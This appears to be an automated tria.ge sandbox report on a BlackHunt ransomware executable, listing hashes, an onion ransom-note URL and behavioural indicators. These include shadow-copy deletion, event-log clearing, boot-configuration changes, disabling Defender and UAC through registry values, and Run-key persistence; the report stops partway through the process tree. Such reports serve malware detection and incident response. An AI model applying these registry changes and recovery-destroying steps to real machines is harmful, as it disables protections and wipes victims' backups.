Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
179s -
max time network
207s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 01:08
Static task
static1
Behavioral task
behavioral1
Sample
de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Resource
win10v2004-20231215-en
General
-
Target
de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
-
Size
707KB
-
MD5
31b37b83804d77f81c043d287a022572
-
SHA1
3211a7e65f36760f1dd465bbb2452db1edea4f2e
-
SHA256
de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25
-
SHA512
8832e70da76994483a124d9fdbab39d16279f4502f7878eee64c72452435da8428827a9a6097d40ac60269a942c8db25c31d450943c3cbd2c5dbd7dff60f6e21
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza158Svnh:6uaTmkZJ+naie5OTamgEoKxLWc8h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5608 fsutil.exe 2700 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection Conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" Conhost.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 6060 wevtutil.exe 3440 wevtutil.exe 5384 wevtutil.exe 3924 wevtutil.exe 3464 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 5568 bcdedit.exe 5576 bcdedit.exe 732 bcdedit.exe 416 bcdedit.exe -
Renames multiple (128) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5552 wbadmin.exe 2236 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\B: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\R: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\I: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\O: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\H: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\M: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\T: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\U: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\K: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\V: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\P: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\A: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\L: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\N: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\Q: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\G: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\X: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\W: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\Y: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\S: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\J: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\Z: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 28 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk-1.8\include\win32\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\jdk\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\#BlackHunt_ReadMe.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\sk.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\images\#BlackHunt_ReadMe.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\#BlackHunt_ReadMe.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\javafx\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Google\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\mk.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\amd64\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\dotnet\host\fxr\6.0.25\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\javafx\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\dotnet\swidtag\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\it.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\include\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\dotnet\host\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\bin\#BlackHunt_ReadMe.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\tg.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\fi.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\#BlackHunt_ReadMe.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin\#BlackHunt_ReadMe.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\#BlackHunt_ReadMe.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\tr.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\include\win32\#BlackHunt_ReadMe.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\ext\#BlackHunt_ReadMe.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\images\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\dotnet\host\fxr\#BlackHunt_ReadMe.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\ka.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Google\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\bin\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\tt.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\License.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\7-Zip\#BlackHunt_ReadMe.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\dotnet\shared\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\jdk\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\dotnet\host\fxr\8.0.0\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\server\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\dotnet\host\fxr\6.0.25\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 268 5148 WerFault.exe 286 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4984 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3928 vssadmin.exe 4588 vssadmin.exe 1120 vssadmin.exe 5540 vssadmin.exe 1352 vssadmin.exe 4064 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 4892 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5456 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Token: SeRestorePrivilege 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Token: SeBackupPrivilege 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Token: SeTakeOwnershipPrivilege 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Token: SeAuditPrivilege 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Token: SeSecurityPrivilege 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Token: SeIncBasePriorityPrivilege 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Token: SeBackupPrivilege 5496 vssvc.exe Token: SeRestorePrivilege 5496 vssvc.exe Token: SeAuditPrivilege 5496 vssvc.exe Token: SeBackupPrivilege 408 wbengine.exe Token: SeRestorePrivilege 408 wbengine.exe Token: SeSecurityPrivilege 408 wbengine.exe Token: SeSecurityPrivilege 3440 wevtutil.exe Token: SeBackupPrivilege 3440 wevtutil.exe Token: SeSecurityPrivilege 6060 wevtutil.exe Token: SeBackupPrivilege 6060 wevtutil.exe Token: SeSecurityPrivilege 5384 wevtutil.exe Token: SeBackupPrivilege 5384 wevtutil.exe Token: SeSecurityPrivilege 3924 wevtutil.exe Token: SeBackupPrivilege 3924 wevtutil.exe Token: SeSecurityPrivilege 3464 wevtutil.exe Token: SeBackupPrivilege 3464 wevtutil.exe Token: SeDebugPrivilege 4892 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4276 wrote to memory of 4852 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 91 PID 4276 wrote to memory of 4852 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 91 PID 4276 wrote to memory of 3972 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 93 PID 4276 wrote to memory of 3972 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 93 PID 4276 wrote to memory of 5016 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 95 PID 4276 wrote to memory of 5016 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 95 PID 4276 wrote to memory of 1236 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 97 PID 4276 wrote to memory of 1236 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 97 PID 4276 wrote to memory of 3420 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 99 PID 4276 wrote to memory of 3420 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 99 PID 4852 wrote to memory of 1116 4852 cmd.exe 101 PID 4852 wrote to memory of 1116 4852 cmd.exe 101 PID 1236 wrote to memory of 2320 1236 cmd.exe 102 PID 1236 wrote to memory of 2320 1236 cmd.exe 102 PID 5016 wrote to memory of 3708 5016 cmd.exe 103 PID 5016 wrote to memory of 3708 5016 cmd.exe 103 PID 3420 wrote to memory of 1068 3420 Process not Found 105 PID 3420 wrote to memory of 1068 3420 Process not Found 105 PID 4276 wrote to memory of 1040 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 106 PID 4276 wrote to memory of 1040 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 106 PID 3972 wrote to memory of 3636 3972 cmd.exe 104 PID 3972 wrote to memory of 3636 3972 cmd.exe 104 PID 4276 wrote to memory of 4720 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 108 PID 4276 wrote to memory of 4720 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 108 PID 4276 wrote to memory of 2888 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 109 PID 4276 wrote to memory of 2888 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 109 PID 4276 wrote to memory of 4456 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 111 PID 4276 wrote to memory of 4456 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 111 PID 4276 wrote to memory of 3140 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 114 PID 4276 wrote to memory of 3140 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 114 PID 4276 wrote to memory of 2384 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 120 PID 4276 wrote to memory of 2384 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 120 PID 4276 wrote to memory of 3184 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 116 PID 4276 wrote to memory of 3184 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 116 PID 1040 wrote to memory of 1988 1040 cmd.exe 119 PID 1040 wrote to memory of 1988 1040 cmd.exe 119 PID 4276 wrote to memory of 4380 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 121 PID 4276 wrote to memory of 4380 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 121 PID 4720 wrote to memory of 3372 4720 cmd.exe 188 PID 4720 wrote to memory of 3372 4720 cmd.exe 188 PID 4456 wrote to memory of 3696 4456 cmd.exe 124 PID 4456 wrote to memory of 3696 4456 cmd.exe 124 PID 4276 wrote to memory of 4520 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 125 PID 4276 wrote to memory of 4520 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 125 PID 4276 wrote to memory of 3528 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 127 PID 4276 wrote to memory of 3528 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 127 PID 2888 wrote to memory of 3200 2888 cmd.exe 129 PID 2888 wrote to memory of 3200 2888 cmd.exe 129 PID 2384 wrote to memory of 4876 2384 cmd.exe 130 PID 2384 wrote to memory of 4876 2384 cmd.exe 130 PID 4276 wrote to memory of 2024 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 134 PID 4276 wrote to memory of 2024 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 134 PID 3184 wrote to memory of 4348 3184 cmd.exe 131 PID 3184 wrote to memory of 4348 3184 cmd.exe 131 PID 4276 wrote to memory of 1840 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 132 PID 4276 wrote to memory of 1840 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 132 PID 4276 wrote to memory of 3556 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 137 PID 4276 wrote to memory of 3556 4276 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 137 PID 3140 wrote to memory of 4388 3140 cmd.exe 136 PID 3140 wrote to memory of 4388 3140 cmd.exe 136 PID 4380 wrote to memory of 3652 4380 cmd.exe 138 PID 4380 wrote to memory of 3652 4380 cmd.exe 138 PID 4520 wrote to memory of 964 4520 cmd.exe 140 PID 4520 wrote to memory of 964 4520 cmd.exe 140 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe"C:\Users\Admin\AppData\Local\Temp\de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
